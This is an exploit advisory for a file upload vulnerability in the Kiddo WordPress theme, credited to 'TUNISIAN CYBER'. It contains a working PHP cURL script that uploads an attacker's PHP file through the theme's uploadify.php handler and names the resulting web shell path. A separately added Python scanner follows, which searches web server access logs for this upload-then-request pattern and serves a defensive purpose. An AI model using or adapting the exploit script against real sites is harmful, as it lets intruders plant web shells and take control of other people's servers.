
Kiddo WP Theme File Upload Vulnerability

Author: TUNISIAN CYBER, Published: 09-02-2014

<?php

/*
[+] Author: TUNISIAN CYBER
[+] Exploit Title: Kiddo WP Theme File Upload Vulnerability
[+] Date: 05-02-2014
[+] Category: WebApp
[+] Google Dork: :(
[+] Tested on: KaliLinux
[+] Vendor: n/a
[+] Friendly Sites: na3il.com,th3-creative.com

Kiddo WP theme suffers from a File Upload Vulnerability

+PoC:
site/wp-content/themes/kiddo/app/assets/js/uploadify/uploadify.php

+Shell Path:
site/3vil.php

ScreenShot: http://i.imgur.com/c62cWHH.png

Greets to: XMaX-tnN43il HacK3rXtechSEt
Sec4Ever Members: DamaneDz, UzunDz, GEOIX
E4A Members: Gastro-DZ

*/

echo "=============================================== \n";
echo "   Kiddo WP Theme File Upload Vulnerability\n";
echo "                 TUNISIAN CYBER   \n";
echo "=============================================== \n\n";
$uploadfile="cyber.php";
 
$ch = curl_init("site/wp-content/themes/kiddo/app/assets/js/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
 
?>
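
For defenders: the request pattern this advisory describes (a POST to the theme's uploadify.php, then a request for a PHP file in the site root) can be searched for in web server access logs. The Python below is an added example, not part of the original advisory; it assumes Combined Log Format, and the sample log lines and IP addresses are constructed.

```python
import re

# Combined Log Format prefix: ip ident user [time] "METHOD target PROTO" status
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# The upload handler named in the advisory, bundled under any theme or plugin.
UPLOADIFY = re.compile(r'/wp-content/(?:themes|plugins)/.+/uploadify\.php$', re.I)
# A PHP file sitting directly in the document root (where the advisory's shell lands).
ROOT_PHP = re.compile(r'/[^/]+\.php', re.I)
# PHP files that WordPress core itself ships in the document root.
CORE_ROOT = {
    "/index.php", "/wp-activate.php", "/wp-blog-header.php", "/wp-comments-post.php",
    "/wp-config.php", "/wp-cron.php", "/wp-links-opml.php", "/wp-load.php",
    "/wp-login.php", "/wp-mail.php", "/wp-settings.php", "/wp-signup.php",
    "/wp-trackback.php", "/xmlrpc.php",
}

# Constructed sample input (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [09/Feb/2014:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [09/Feb/2014:10:02:11 +0000] "POST /wp-content/themes/kiddo/app/assets/js/uploadify/uploadify.php HTTP/1.1" 200 1 "-" "-"',
    '203.0.113.9 - - [09/Feb/2014:10:02:15 +0000] "GET /3vil.php HTTP/1.1" 200 312 "-" "-"',
    '198.51.100.7 - - [09/Feb/2014:10:03:40 +0000] "GET /wp-login.php HTTP/1.1" 200 2211 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [09/Feb/2014:10:04:00 +0000] "GET /xmlrpc.php HTTP/1.1" 200 42 "-" "-"',
]

def scan(lines):
    """Return (line_no, ip, kind, path, status) for each suspicious request."""
    findings, uploaders = [], set()
    for n, line in enumerate(lines, 1):
        m = LINE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        ip, _ts, method, target, status = m.groups()
        path = target.split("?", 1)[0]
        if method == "POST" and UPLOADIFY.search(path):
            # Any POST to the handler is worth reviewing, whatever the status.
            uploaders.add(ip)
            findings.append((n, ip, "upload-post", path, int(status)))
        elif (ip in uploaders and status == "200" and ROOT_PHP.fullmatch(path)
              and path.lower() not in CORE_ROOT):
            # Same client then fetched a non-core PHP file from the site root.
            findings.append((n, ip, "new-root-php", path, 200))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit of the second kind should be followed by checking the named file on disk and its modification time against the upload request.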
